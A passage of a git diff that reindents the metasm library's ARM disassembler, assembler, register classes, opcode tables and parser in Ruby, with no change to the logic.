b..(b | (255^msk)) - lookaside[i] << op if i & msk == b - end - } - - lookaside - end - - def decode_findopcode(edata) - return if edata.ptr >= edata.data.length - di = DecodedInstruction.new(self) - val = edata.decode_imm(:u32, @endianness) - di.instance_variable_set('@raw', val) - di if di.opcode = @bin_lookaside[(val >> 20) & 0xff].find { |op| - (not op.props[:cond] or - ((val >> @fields_shift[:cond]) & @fields_mask[:cond]) != 0xf) and - (op.bin & op.bin_mask) == (val & op.bin_mask) - } - end - - def disassembler_default_func - df = DecodedFunction.new - df - end - - def decode_instr_op(edata, di) - op = di.opcode - di.instruction.opname = op.name - val = di.instance_variable_get('@raw') - - field_val = lambda { |f| - r = (val >> @fields_shift[f]) & @fields_mask[f] - case f - when :i16; Expression.make_signed(r, 16) - when :i24; Expression.make_signed(r, 24) - when :i8_12; ((r >> 4) & 0xf0) | (r & 0xf) - when :stype; [:lsl, :lsr, :asr, :ror][r] - when :u; [:-, :+][r] - else r - end - } - - if op.props[:cond] - cd = %w[eq ne cs cc mi pl vs vc hi ls ge lt gt le al][field_val[:cond]] - if cd != 'al' - di.opcode = di.opcode.dup - di.instruction.opname = di.opcode.name.dup - di.instruction.opname[(op.props[:cond_name_off] || di.opcode.name.length), 0] = cd - if di.opcode.props[:stopexec] - di.opcode.props = di.opcode.props.dup - di.opcode.props.delete :stopexec - end - end - end - - op.args.each { |a| - di.instruction.args << case a - when :rd, :rn, :rm; Reg.new field_val[a] - when :rm_rs; Reg.new field_val[:rm], field_val[:stype], Reg.new(field_val[:rs]) - when :rm_is; Reg.new field_val[:rm], field_val[:stype], field_val[:shifti]*2 - when :i24; Expression[field_val[a] << 2] - when :i8_r - i = field_val[:i8] - r = field_val[:rotate]*2 - Expression[((i >> r) | (i << (32-r))) & 0xffff_ffff] - when :mem_rn_rm, :mem_rn_i8_12, :mem_rn_rms, :mem_rn_i12 - b = Reg.new(field_val[:rn]) - o = case a - when :mem_rn_rm; Reg.new(field_val[:rm]) - when :mem_rn_i8_12; field_val[:i8_12] - when :mem_rn_rms; Reg.new(field_val[:rm], field_val[:stype], field_val[:shifti]*2) - when :mem_rn_i12; field_val[:i12] - end - Memref.new(b, o, field_val[:u], op.props[:baseincr]) - when :reglist - di.instruction.args.last.updated = true if op.props[:baseincr] - msk = field_val[a] - l = RegList.new((0..15).map { |i| Reg.new(i) if (msk & (1 << i)) > 0 }.compact) - l.usermoderegs = true if op.props[:usermoderegs] - l - else raise SyntaxError, "Internal error: invalid argument #{a} in #{op.name}" - end - } - - di.bin_length = 4 - di - end - - def decode_instr_interpret(di, addr) - if di.opcode.args.include? :i24 - di.instruction.args[-1] = Expression[di.instruction.args[-1] + addr + 8] - end - di - end - - def backtrace_binding - @backtrace_binding ||= init_backtrace_binding - end + # create the bin_mask for a given opcode + def build_opcode_bin_mask(op) + # bit = 0 if can be mutated by an field value, 1 if fixed by opcode + op.bin_mask = 0 + op.fields.each { |k, (m, s)| + op.bin_mask |= m << s + } + op.bin_mask = 0xffffffff ^ op.bin_mask + end + + # create the lookaside hash from the first byte of the opcode + def build_bin_lookaside + lookaside = Array.new(256) { [] } + + opcode_list.each { |op| + build_opcode_bin_mask op + + b = (op.bin >> 20) & 0xff + msk = (op.bin_mask >> 20) & 0xff + b &= msk + + for i in b..(b | (255^msk)) + lookaside[i] << op if i & msk == b + end + } + + lookaside + end + + def decode_findopcode(edata) + return if edata.ptr >= edata.data.length + di = DecodedInstruction.new(self) + val = edata.decode_imm(:u32, @endianness) + di.instance_variable_set('@raw', val) + di if di.opcode = @bin_lookaside[(val >> 20) & 0xff].find { |op| + (not op.props[:cond] or + ((val >> @fields_shift[:cond]) & @fields_mask[:cond]) != 0xf) and + (op.bin & op.bin_mask) == (val & op.bin_mask) + } + end + + def disassembler_default_func + df = DecodedFunction.new + df + end + + def decode_instr_op(edata, di) + op = di.opcode + di.instruction.opname = op.name + val = di.instance_variable_get('@raw') + + field_val = lambda { |f| + r = (val >> @fields_shift[f]) & @fields_mask[f] + case f + when :i16; Expression.make_signed(r, 16) + when :i24; Expression.make_signed(r, 24) + when :i8_12; ((r >> 4) & 0xf0) | (r & 0xf) + when :stype; [:lsl, :lsr, :asr, :ror][r] + when :u; [:-, :+][r] + else r + end + } + + if op.props[:cond] + cd = %w[eq ne cs cc mi pl vs vc hi ls ge lt gt le al][field_val[:cond]] + if cd != 'al' + di.opcode = di.opcode.dup + di.instruction.opname = di.opcode.name.dup + di.instruction.opname[(op.props[:cond_name_off] || di.opcode.name.length), 0] = cd + if di.opcode.props[:stopexec] + di.opcode.props = di.opcode.props.dup + di.opcode.props.delete :stopexec + end + end + end + + op.args.each { |a| + di.instruction.args << case a + when :rd, :rn, :rm; Reg.new field_val[a] + when :rm_rs; Reg.new field_val[:rm], field_val[:stype], Reg.new(field_val[:rs]) + when :rm_is; Reg.new field_val[:rm], field_val[:stype], field_val[:shifti]*2 + when :i24; Expression[field_val[a] << 2] + when :i8_r + i = field_val[:i8] + r = field_val[:rotate]*2 + Expression[((i >> r) | (i << (32-r))) & 0xffff_ffff] + when :mem_rn_rm, :mem_rn_i8_12, :mem_rn_rms, :mem_rn_i12 + b = Reg.new(field_val[:rn]) + o = case a + when :mem_rn_rm; Reg.new(field_val[:rm]) + when :mem_rn_i8_12; field_val[:i8_12] + when :mem_rn_rms; Reg.new(field_val[:rm], field_val[:stype], field_val[:shifti]*2) + when :mem_rn_i12; field_val[:i12] + end + Memref.new(b, o, field_val[:u], op.props[:baseincr]) + when :reglist + di.instruction.args.last.updated = true if op.props[:baseincr] + msk = field_val[a] + l = RegList.new((0..15).map { |i| Reg.new(i) if (msk & (1 << i)) > 0 }.compact) + l.usermoderegs = true if op.props[:usermoderegs] + l + else raise SyntaxError, "Internal error: invalid argument #{a} in #{op.name}" + end + } + + di.bin_length = 4 + di + end + + def decode_instr_interpret(di, addr) + if di.opcode.args.include? :i24 + di.instruction.args[-1] = Expression[di.instruction.args[-1] + addr + 8] + end + di + end + + def backtrace_binding + @backtrace_binding ||= init_backtrace_binding + end - def init_backtrace_binding - @backtrace_binding ||= {} - end - - def get_backtrace_binding(di) - a = di.instruction.args.map { |arg| - case arg - when Reg; arg.symbolic - when Memref; arg.symbolic(di.address) - else arg - end - } - - if binding = backtrace_binding[di.opcode.name] - bd = binding[di, *a] - else - puts "unhandled instruction to backtrace: #{di}" if $VERBOSE - # assume nothing except the 1st arg is modified - case a[0] - when Indirection, Symbol; { a[0] => Expression::Unknown } - when Expression; (x = a[0].externals.first) ? { x => Expression::Unknown } : {} - else {} - end.update(:incomplete_binding => Expression[1]) - end - - end - - def get_xrefs_x(dasm, di) - if di.opcode.props[:setip] - [di.instruction.args.last] - else - # TODO ldr pc, .. - [] - end - end + def init_backtrace_binding + @backtrace_binding ||= {} + end + + def get_backtrace_binding(di) + a = di.instruction.args.map { |arg| + case arg + when Reg; arg.symbolic + when Memref; arg.symbolic(di.address) + else arg + end + } + + if binding = backtrace_binding[di.opcode.name] + bd = binding[di, *a] + else + puts "unhandled instruction to backtrace: #{di}" if $VERBOSE + # assume nothing except the 1st arg is modified + case a[0] + when Indirection, Symbol; { a[0] => Expression::Unknown } + when Expression; (x = a[0].externals.first) ? { x => Expression::Unknown } : {} + else {} + end.update(:incomplete_binding => Expression[1]) + end + + end + + def get_xrefs_x(dasm, di) + if di.opcode.props[:setip] + [di.instruction.args.last] + else + # TODO ldr pc, .. + [] + end + end end end diff --git a/lib/metasm/metasm/arm/encode.rb b/lib/metasm/metasm/arm/encode.rb index cbf1ecefea8f9..05f139328501e 100644 --- a/lib/metasm/metasm/arm/encode.rb +++ b/lib/metasm/metasm/arm/encode.rb @@ -9,69 +9,69 @@ module Metasm class ARM - def encode_instr_op(section, instr, op) - base = op.bin - set_field = lambda { |f, v| - v = v.reduce if v.kind_of? Expression - case f - when :i8_12 - base = Expression[base, :|, [[v, :&, 0xf], :|, [[v, :<<, 4], :&, 0xf00]]] - next - when :stype; v = [:lsl, :lsr, :asr, :ror].index(v) - when :u; v = [:-, :+].index(v) - end - base = Expression[base, :|, [[v, :&, @fields_mask[f]], :<<, @fields_shift[f]]] - } + def encode_instr_op(section, instr, op) + base = op.bin + set_field = lambda { |f, v| + v = v.reduce if v.kind_of? Expression + case f + when :i8_12 + base = Expression[base, :|, [[v, :&, 0xf], :|, [[v, :<<, 4], :&, 0xf00]]] + next + when :stype; v = [:lsl, :lsr, :asr, :ror].index(v) + when :u; v = [:-, :+].index(v) + end + base = Expression[base, :|, [[v, :&, @fields_mask[f]], :<<, @fields_shift[f]]] + } - val, mask, shift = 0, 0, 0 + val, mask, shift = 0, 0, 0 - if op.props[:cond] - coff = op.props[:cond_name_off] || op.name.length - cd = instr.opname[coff, 2] - cdi = %w[eq ne cs cc mi pl vs vc hi ls ge lt gt le al].index(cd) || 14 # default = al - set_field[:cond, cdi] - end + if op.props[:cond] + coff = op.props[:cond_name_off] || op.name.length + cd = instr.opname[coff, 2] + cdi = %w[eq ne cs cc mi pl vs vc hi ls ge lt gt le al].index(cd) || 14 # default = al + set_field[:cond, cdi] + end - op.args.zip(instr.args).each { |sym, arg| - case sym - when :rd, :rs, :rn, :rm; set_field[sym, arg.i] - when :rm_rs - set_field[:rm, arg.i] - set_field[:stype, arg.stype] - set_field[:rs, arg.shift.i] - when :rm_is - set_field[:rm, arg.i] - set_field[:stype, arg.stype] - set_field[:shifti, arg.shift/2] - when :mem_rn_rm, :mem_rn_rms, :mem_rn_i8_12, :mem_rn_i12 - set_field[:rn, arg.base.i] - case sym - when :mem_rn_rm - set_field[:rm, arg.offset.i] - when :mem_rn_rms - set_field[:rm, arg.offset.i] - set_field[:stype, arg.offset.stype] - set_field[:rs, arg.offset.shift.i] - when :mem_rn_i8_12 - set_field[:i8_12, arg.offset] - when :mem_rn_i12 - set_field[:i12, arg.offset] - end - # TODO set_field[:u] etc - when :reglist - set_field[sym, arg.list.inject(0) { |rl, r| rl | (1 << r.i) }] - when :i8_r - # XXX doublecheck this - b = arg.reduce & 0xffffffff - r = (0..15).find { next true if b < 0x10 ; b = (b >> 2) | ((b & 3) << 30) } - set_field[:i8, b] - set_field[:rotate, r] - when :i16, :i24 - val, mask, shift = arg, @fields_mask[sym], @fields_shift[sym] - end - } + op.args.zip(instr.args).each { |sym, arg| + case sym + when :rd, :rs, :rn, :rm; set_field[sym, arg.i] + when :rm_rs + set_field[:rm, arg.i] + set_field[:stype, arg.stype] + set_field[:rs, arg.shift.i] + when :rm_is + set_field[:rm, arg.i] + set_field[:stype, arg.stype] + set_field[:shifti, arg.shift/2] + when :mem_rn_rm, :mem_rn_rms, :mem_rn_i8_12, :mem_rn_i12 + set_field[:rn, arg.base.i] + case sym + when :mem_rn_rm + set_field[:rm, arg.offset.i] + when :mem_rn_rms + set_field[:rm, arg.offset.i] + set_field[:stype, arg.offset.stype] + set_field[:rs, arg.offset.shift.i] + when :mem_rn_i8_12 + set_field[:i8_12, arg.offset] + when :mem_rn_i12 + set_field[:i12, arg.offset] + end + # TODO set_field[:u] etc + when :reglist + set_field[sym, arg.list.inject(0) { |rl, r| rl | (1 << r.i) }] + when :i8_r + # XXX doublecheck this + b = arg.reduce & 0xffffffff + r = (0..15).find { next true if b < 0x10 ; b = (b >> 2) | ((b & 3) << 30) } + set_field[:i8, b] + set_field[:rotate, r] + when :i16, :i24 + val, mask, shift = arg, @fields_mask[sym], @fields_shift[sym] + end + } - Expression[base, :|, [[val, :<<, shift], :&, mask]].encode(:u32, @endianness) - end + Expression[base, :|, [[val, :<<, shift], :&, mask]].encode(:u32, @endianness) + end end end diff --git a/lib/metasm/metasm/arm/main.rb b/lib/metasm/metasm/arm/main.rb index 0c622966bbb6e..ab9a36a3a566d 100644 --- a/lib/metasm/metasm/arm/main.rb +++ b/lib/metasm/metasm/arm/main.rb @@ -8,65 +8,65 @@ module Metasm class ARM < CPU - class Reg - class << self - attr_accessor :s_to_i, :i_to_s - end - @i_to_s = %w[r0 r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 sp lr pc] - @s_to_i = { 'wr' => 7, 'sb' => 9, 'sl' => 10, 'fp' => 11, 'ip' => 12, 'sp' => 13, 'lr' => 14, 'pc' => 15 } - 15.times { |i| @s_to_i["r#{i}"] = i } - 4.times { |i| @s_to_i["a#{i+1}"] = i } - 8.times { |i| @s_to_i["v#{i+1}"] = i+4 } + class Reg + class << self + attr_accessor :s_to_i, :i_to_s + end + @i_to_s = %w[r0 r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 sp lr pc] + @s_to_i = { 'wr' => 7, 'sb' => 9, 'sl' => 10, 'fp' => 11, 'ip' => 12, 'sp' => 13, 'lr' => 14, 'pc' => 15 } + 15.times { |i| @s_to_i["r#{i}"] = i } + 4.times { |i| @s_to_i["a#{i+1}"] = i } + 8.times { |i| @s_to_i["v#{i+1}"] = i+4 } - attr_accessor :i, :stype, :shift, :updated - def initialize(i, stype=:lsl, shift=0) - @i = i - @stype = stype - @shift = shift - end + attr_accessor :i, :stype, :shift, :updated + def initialize(i, stype=:lsl, shift=0) + @i = i + @stype = stype + @shift = shift + end - def symbolic - r = self.class.i_to_s[@i].to_sym - if @stype == :lsl and @shift == 0 - r - else - r # TODO shift/rotate/... - end - end - end + def symbolic + r = self.class.i_to_s[@i].to_sym + if @stype == :lsl and @shift == 0 + r + else + r # TODO shift/rotate/... + end + end + end - class Memref - attr_accessor :base, :offset, :sign, :incr - def initialize(base, offset, sign=:+, incr=nil) - @base, @offset, @sign, @incr = base, offset, sign, incr - end + class Memref + attr_accessor :base, :offset, :sign, :incr + def initialize(base, offset, sign=:+, incr=nil) + @base, @offset, @sign, @incr = base, offset, sign, incr + end - def symbolic(len=4, orig=nil) - o = @offset - o = o.symbolic if o.kind_of? Reg - p = Expression[@base.symbolic, @sign, o].reduce - Indirection[p, len, orig] - end - end + def symbolic(len=4, orig=nil) + o = @offset + o = o.symbolic if o.kind_of? Reg + p = Expression[@base.symbolic, @sign, o].reduce + Indirection[p, len, orig] + end + end - class RegList - attr_accessor :list, :usermoderegs + class RegList + attr_accessor :list, :usermoderegs - def initialize(l=[]) - @list = l - end - end + def initialize(l=[]) + @list = l + end + end - def initialize(endianness = :little) - super() - @endianness = endianness - @size = 32 - end + def initialize(endianness = :little) + super() + @endianness = endianness + @size = 32 + end - def init_opcode_list - init_latest - @opcode_list - end + def init_opcode_list + init_latest + @opcode_list + end end class ARM_THUMB < ARM diff --git a/lib/metasm/metasm/arm/opcodes.rb b/lib/metasm/metasm/arm/opcodes.rb index 0aa3eed5174c4..4055c2297c806 100644 --- a/lib/metasm/metasm/arm/opcodes.rb +++ b/lib/metasm/metasm/arm/opcodes.rb @@ -8,170 +8,170 @@ module Metasm class ARM - private - def addop(name, bin, *args) - args << :cond if not args.delete :uncond - - o = Opcode.new name, bin - o.args.concat(args & @valid_args) - (args & @valid_props).each { |p| o.props[p] = true } - args.grep(Hash).each { |h| o.props.update h } - - # special args -> multiple fields - case (o.args & [:i8_r, :rm_is, :rm_rs, :mem_rn_rm, :mem_rn_i8_12, :mem_rn_rms, :mem_rn_i12]).first - when :i8_r; args << :i8 << :rotate - when :rm_is; args << :rm << :stype << :shifti - when :rm_rs; args << :rm << :stype << :rs - when :mem_rn_rm; args << :rn << :rm << :rsx << :u - when :mem_rn_i8_12; args << :rn << :i8_12 << :u - when :mem_rn_rms; args << :rn << :rm << :stype << :shifti << :u - when :mem_rn_i12; args << :rn << :i12 << :u - end - - (args & @fields_mask.keys).each { |f| - o.fields[f] = [@fields_mask[f], @fields_shift[f]] - } - - @opcode_list << o - end - - def addop_data_s(name, op, a1, a2, *h) - addop name, op | (1 << 25), a1, a2, :i8_r, :rotate, *h - addop name, op, a1, a2, :rm_is, *h - addop name, op | (1 << 4), a1, a2, :rm_rs, *h - end - def addop_data(name, op, a1, a2) - addop_data_s name, op << 21, a1, a2 - addop_data_s name+'s', (op << 21) | (1 << 20), a1, a2, :cond_name_off => name.length - end - - def addop_load_puw(name, op, *a) - addop name, op, {:baseincr => :post}, :rd, :u, *a - addop name, op | (1 << 24), :rd, :u, *a - addop name, op | (1 << 24) | (1 << 21), {:baseincr => :pre}, :rd, :u, *a - end - def addop_load_lsh_o(name, op) - addop_load_puw name, op, :rsz, :mem_rn_rm, {:cond_name_off => 3} - addop_load_puw name, op | (1 << 22), :mem_rn_i8_12, {:cond_name_off => 3} - end - def addop_load_lsh - op = 9 << 4 - addop_load_lsh_o 'strh', op | (1 << 5) - addop_load_lsh_o 'ldrd', op | (1 << 6) - addop_load_lsh_o 'strd', op | (1 << 6) | (1 << 5) - addop_load_lsh_o 'ldrh', op | (1 << 20) | (1 << 5) - addop_load_lsh_o 'ldrsb', op | (1 << 20) | (1 << 6) - addop_load_lsh_o 'ldrsh', op | (1 << 20) | (1 << 6) | (1 << 5) - end - - def addop_load_puwt(name, op, *a) - addop_load_puw name, op, *a - addop name+'t', op | (1 << 21), {:baseincr => :post, :cond_name_off => name.length}, :rd, :u, *a - end - def addop_load_o(name, op, *a) - addop_load_puwt name, op, :mem_rn_i12, *a - addop_load_puwt name, op | (1 << 25), :mem_rn_rms, *a - end - def addop_load(name, op) - addop_load_o name, op - addop_load_o name+'b', op | (1 << 22), :cond_name_off => name.length - end - - def addop_ldm_go(name, op, *a) - addop name, op, :rn, :reglist, {:cond_name_off => 3}, *a - end - def addop_ldm_w(name, op, *a) - addop_ldm_go name, op, *a # base reg untouched - addop_ldm_go name, op | (1 << 21), {:baseincr => :post}, *a # base updated - end - def addop_ldm_s(name, op) - addop_ldm_w name, op # transfer regs - addop_ldm_w name, op | (1 << 22), :usermoderegs # transfer usermode regs - end - def addop_ldm_p(name, op) - addop_ldm_s name+'a', op # target memory included - addop_ldm_s name+'b', op | (1 << 24) # target memory excluded, transfer starts at next addr - end - def addop_ldm_u(name, op) - addop_ldm_p name+'d', op # transfer made downward - addop_ldm_p name+'i', op | (1 << 23) # transfer made upward - end - def addop_ldm(name, op) - addop_ldm_u name, op - end - - # ARMv6 instruction set, aka arm7/arm9 - def init_arm_v6 - @opcode_list = [] - @valid_props << :baseincr << :cond << :cond_name_off << :usermoderegs << - :tothumb << :tojazelle - @valid_args.concat [:rn, :rd, :rm, :crn, :crd, :crm, :cpn, :reglist, :i24, - :rm_rs, :rm_is, :i8_r, :mem_rn_rm, :mem_rn_i8_12, :mem_rn_rms, :mem_rn_i12] - @fields_mask.update :rn => 0xf, :rd => 0xf, :rs => 0xf, :rm => 0xf, - :crn => 0xf, :crd => 0xf, :crm => 0xf, :cpn => 0xf, - :rnx => 0xf, :rdx => 0xf, :rsx => 0xf, - :shifti => 0x1f, :stype => 3, :rotate => 0xf, :reglist => 0xffff, - :i8 => 0xff, :i12 => 0xfff, :i24 => 0xff_ffff, :i8_12 => 0xf0f, - :u => 1, :mask => 0xf, :sbo => 0xf, :cond => 0xf - - @fields_shift.update :rn => 16, :rd => 12, :rs => 8, :rm => 0, - :crn => 16, :crd => 12, :crm => 0, :cpn => 8, - :rnx => 16, :rdx => 12, :rsx => 8, - :shifti => 7, :stype => 5, :rotate => 8, :reglist => 0, - :i8 => 0, :i12 => 0, :i24 => 0, :i8_12 => 0, - :u => 23, :mask => 16, :sbo => 12, :cond => 28 - - addop_data 'and', 0, :rd, :rn - addop_data 'eor', 1, :rd, :rn - addop_data 'xor', 1, :rd, :rn - addop_data 'sub', 2, :rd, :rn - addop_data 'rsb', 3, :rd, :rn - addop_data 'add', 4, :rd, :rn - addop_data 'adc', 5, :rd, :rn - addop_data 'sbc', 6, :rd, :rn - addop_data 'rsc', 7, :rd, :rn - addop_data 'tst', 8, :rdx, :rn - addop_data 'teq', 9, :rdx, :rn - addop_data 'cmp', 10, :rdx, :rn - addop_data 'cmn', 11, :rdx, :rn - addop_data 'orr', 12, :rd, :rn - addop_data 'or', 12, :rd, :rn - addop_data 'mov', 13, :rd, :rnx - addop_data 'bic', 14, :rd, :rn - addop_data 'mvn', 15, :rd, :rnx - - addop 'b', 0b1010 << 24, :setip, :stopexec, :i24 - addop 'bl', 0b1011 << 24, :setip, :stopexec, :i24, :saveip - addop 'bkpt', (0b00010010 << 20) | (0b0111 << 4) # other fields are available&unused, also cnd != AL is undef - addop 'blx', 0b1111101 << 25, :setip, :stopexec, :saveip, :tothumb, :h, :nocond, :i24 - addop 'blx', (0b00010010 << 20) | (0b0011 << 4), :setip, :stopexec, :saveip, :tothumb, :rm - addop 'bx', (0b00010010 << 20) | (0b0001 << 4), :setip, :stopexec, :rm - addop 'bxj', (0b00010010 << 20) | (0b0010 << 4), :setip, :stopexec, :rm, :tojazelle - - addop_load 'str', (1 << 26) - addop_load 'ldr', (1 << 26) | (1 << 20) - addop_load_lsh - addop_ldm 'stm', (1 << 27) - addop_ldm 'ldm', (1 << 27) | (1 << 20) - end - alias init_latest init_arm_v6 + private + def addop(name, bin, *args) + args << :cond if not args.delete :uncond + + o = Opcode.new name, bin + o.args.concat(args & @valid_args) + (args & @valid_props).each { |p| o.props[p] = true } + args.grep(Hash).each { |h| o.props.update h } + + # special args -> multiple fields + case (o.args & [:i8_r, :rm_is, :rm_rs, :mem_rn_rm, :mem_rn_i8_12, :mem_rn_rms, :mem_rn_i12]).first + when :i8_r; args << :i8 << :rotate + when :rm_is; args << :rm << :stype << :shifti + when :rm_rs; args << :rm << :stype << :rs + when :mem_rn_rm; args << :rn << :rm << :rsx << :u + when :mem_rn_i8_12; args << :rn << :i8_12 << :u + when :mem_rn_rms; args << :rn << :rm << :stype << :shifti << :u + when :mem_rn_i12; args << :rn << :i12 << :u + end + + (args & @fields_mask.keys).each { |f| + o.fields[f] = [@fields_mask[f], @fields_shift[f]] + } + + @opcode_list << o + end + + def addop_data_s(name, op, a1, a2, *h) + addop name, op | (1 << 25), a1, a2, :i8_r, :rotate, *h + addop name, op, a1, a2, :rm_is, *h + addop name, op | (1 << 4), a1, a2, :rm_rs, *h + end + def addop_data(name, op, a1, a2) + addop_data_s name, op << 21, a1, a2 + addop_data_s name+'s', (op << 21) | (1 << 20), a1, a2, :cond_name_off => name.length + end + + def addop_load_puw(name, op, *a) + addop name, op, {:baseincr => :post}, :rd, :u, *a + addop name, op | (1 << 24), :rd, :u, *a + addop name, op | (1 << 24) | (1 << 21), {:baseincr => :pre}, :rd, :u, *a + end + def addop_load_lsh_o(name, op) + addop_load_puw name, op, :rsz, :mem_rn_rm, {:cond_name_off => 3} + addop_load_puw name, op | (1 << 22), :mem_rn_i8_12, {:cond_name_off => 3} + end + def addop_load_lsh + op = 9 << 4 + addop_load_lsh_o 'strh', op | (1 << 5) + addop_load_lsh_o 'ldrd', op | (1 << 6) + addop_load_lsh_o 'strd', op | (1 << 6) | (1 << 5) + addop_load_lsh_o 'ldrh', op | (1 << 20) | (1 << 5) + addop_load_lsh_o 'ldrsb', op | (1 << 20) | (1 << 6) + addop_load_lsh_o 'ldrsh', op | (1 << 20) | (1 << 6) | (1 << 5) + end + + def addop_load_puwt(name, op, *a) + addop_load_puw name, op, *a + addop name+'t', op | (1 << 21), {:baseincr => :post, :cond_name_off => name.length}, :rd, :u, *a + end + def addop_load_o(name, op, *a) + addop_load_puwt name, op, :mem_rn_i12, *a + addop_load_puwt name, op | (1 << 25), :mem_rn_rms, *a + end + def addop_load(name, op) + addop_load_o name, op + addop_load_o name+'b', op | (1 << 22), :cond_name_off => name.length + end + + def addop_ldm_go(name, op, *a) + addop name, op, :rn, :reglist, {:cond_name_off => 3}, *a + end + def addop_ldm_w(name, op, *a) + addop_ldm_go name, op, *a # base reg untouched + addop_ldm_go name, op | (1 << 21), {:baseincr => :post}, *a # base updated + end + def addop_ldm_s(name, op) + addop_ldm_w name, op # transfer regs + addop_ldm_w name, op | (1 << 22), :usermoderegs # transfer usermode regs + end + def addop_ldm_p(name, op) + addop_ldm_s name+'a', op # target memory included + addop_ldm_s name+'b', op | (1 << 24) # target memory excluded, transfer starts at next addr + end + def addop_ldm_u(name, op) + addop_ldm_p name+'d', op # transfer made downward + addop_ldm_p name+'i', op | (1 << 23) # transfer made upward + end + def addop_ldm(name, op) + addop_ldm_u name, op + end + + # ARMv6 instruction set, aka arm7/arm9 + def init_arm_v6 + @opcode_list = [] + @valid_props << :baseincr << :cond << :cond_name_off << :usermoderegs << + :tothumb << :tojazelle + @valid_args.concat [:rn, :rd, :rm, :crn, :crd, :crm, :cpn, :reglist, :i24, + :rm_rs, :rm_is, :i8_r, :mem_rn_rm, :mem_rn_i8_12, :mem_rn_rms, :mem_rn_i12] + @fields_mask.update :rn => 0xf, :rd => 0xf, :rs => 0xf, :rm => 0xf, + :crn => 0xf, :crd => 0xf, :crm => 0xf, :cpn => 0xf, + :rnx => 0xf, :rdx => 0xf, :rsx => 0xf, + :shifti => 0x1f, :stype => 3, :rotate => 0xf, :reglist => 0xffff, + :i8 => 0xff, :i12 => 0xfff, :i24 => 0xff_ffff, :i8_12 => 0xf0f, + :u => 1, :mask => 0xf, :sbo => 0xf, :cond => 0xf + + @fields_shift.update :rn => 16, :rd => 12, :rs => 8, :rm => 0, + :crn => 16, :crd => 12, :crm => 0, :cpn => 8, + :rnx => 16, :rdx => 12, :rsx => 8, + :shifti => 7, :stype => 5, :rotate => 8, :reglist => 0, + :i8 => 0, :i12 => 0, :i24 => 0, :i8_12 => 0, + :u => 23, :mask => 16, :sbo => 12, :cond => 28 + + addop_data 'and', 0, :rd, :rn + addop_data 'eor', 1, :rd, :rn + addop_data 'xor', 1, :rd, :rn + addop_data 'sub', 2, :rd, :rn + addop_data 'rsb', 3, :rd, :rn + addop_data 'add', 4, :rd, :rn + addop_data 'adc', 5, :rd, :rn + addop_data 'sbc', 6, :rd, :rn + addop_data 'rsc', 7, :rd, :rn + addop_data 'tst', 8, :rdx, :rn + addop_data 'teq', 9, :rdx, :rn + addop_data 'cmp', 10, :rdx, :rn + addop_data 'cmn', 11, :rdx, :rn + addop_data 'orr', 12, :rd, :rn + addop_data 'or', 12, :rd, :rn + addop_data 'mov', 13, :rd, :rnx + addop_data 'bic', 14, :rd, :rn + addop_data 'mvn', 15, :rd, :rnx + + addop 'b', 0b1010 << 24, :setip, :stopexec, :i24 + addop 'bl', 0b1011 << 24, :setip, :stopexec, :i24, :saveip + addop 'bkpt', (0b00010010 << 20) | (0b0111 << 4) # other fields are available&unused, also cnd != AL is undef + addop 'blx', 0b1111101 << 25, :setip, :stopexec, :saveip, :tothumb, :h, :nocond, :i24 + addop 'blx', (0b00010010 << 20) | (0b0011 << 4), :setip, :stopexec, :saveip, :tothumb, :rm + addop 'bx', (0b00010010 << 20) | (0b0001 << 4), :setip, :stopexec, :rm + addop 'bxj', (0b00010010 << 20) | (0b0010 << 4), :setip, :stopexec, :rm, :tojazelle + + addop_load 'str', (1 << 26) + addop_load 'ldr', (1 << 26) | (1 << 20) + addop_load_lsh + addop_ldm 'stm', (1 << 27) + addop_ldm 'ldm', (1 << 27) | (1 << 20) + end + alias init_latest init_arm_v6 end end __END__ - addop_cond 'mrs', 0b0001000011110000000000000000, :rd - addop_cond 'msr', 0b0001001010011111000000000000, :rd - addop_cond 'msrf', 0b0001001010001111000000000000, :rd + addop_cond 'mrs', 0b0001000011110000000000000000, :rd + addop_cond 'msr', 0b0001001010011111000000000000, :rd + addop_cond 'msrf', 0b0001001010001111000000000000, :rd - addop_cond 'mul', 0b000000000000001001 << 4, :rd, :rn, :rs, :rm - addop_cond 'mla', 0b100000000000001001 << 4, :rd, :rn, :rs, :rm + addop_cond 'mul', 0b000000000000001001 << 4, :rd, :rn, :rs, :rm + addop_cond 'mla', 0b100000000000001001 << 4, :rd, :rn, :rs, :rm - addop_cond 'swp', 0b0001000000000000000010010000, :rd, :rn, :rs, :rm - addop_cond 'swpb', 0b0001010000000000000010010000, :rd, :rn, :rs, :rm + addop_cond 'swp', 0b0001000000000000000010010000, :rd, :rn, :rs, :rm + addop_cond 'swpb', 0b0001010000000000000010010000, :rd, :rn, :rs, :rm - addop_cond 'undef', 0b00000110000000000000000000010000 + addop_cond 'undef', 0b00000110000000000000000000010000 - addop_cond 'swi', 0b00001111 << 24 + addop_cond 'swi', 0b00001111 << 24 - addop_cond 'bkpt', 0b1001000000000000001110000 - addop_cond 'movw', 0b0011 << 24, :movwimm + addop_cond 'bkpt', 0b1001000000000000001110000 + addop_cond 'movw', 0b0011 << 24, :movwimm diff --git a/lib/metasm/metasm/arm/parse.rb b/lib/metasm/metasm/arm/parse.rb index 54885a36eaa3a..a7bf5ab9411b5 100644 --- a/lib/metasm/metasm/arm/parse.rb +++ b/lib/metasm/metasm/arm/parse.rb @@ -9,122 +9,122 @@ module Metasm class ARM - def opcode_list_byname - @opcode_list_byname ||= opcode_list.inject({}) { |h, o| - (h[o.name] ||= []) << o - if o.props[:cond] - coff = o.props[:cond_name_off] || o.name.length - %w[eq ne cs cc mi pl vs vc hi ls ge lt gt le al].each { |cd| - n = o.name.dup - n[coff, 0] = cd - (h[n] ||= []) << o - } - end - h - } - end + def opcode_list_byname + @opcode_list_byname ||= opcode_list.inject({}) { |h, o| + (h[o.name] ||= []) << o + if o.props[:cond] + coff = o.props[:cond_name_off] || o.name.length + %w[eq ne cs cc mi pl vs vc hi ls ge lt gt le al].each { |cd| + n = o.name.dup + n[coff, 0] = cd + (h[n] ||= []) << o + } + end + h + } + end - def parse_arg_valid?(op, sym, arg) - case sym - when :rd, :rs, :rn, :rm; arg.kind_of? Reg and arg.shift == 0 and (arg.updated ? op.props[:baseincr] : !op.props[:baseincr]) - when :rm_rs; arg.kind_of? Reg and arg.shift.kind_of? Reg - when :rm_is; arg.kind_of? Reg and arg.shift.kind_of? Integer - when :i16, :i24, :i8_12, :i8_r; arg.kind_of? Expression - when 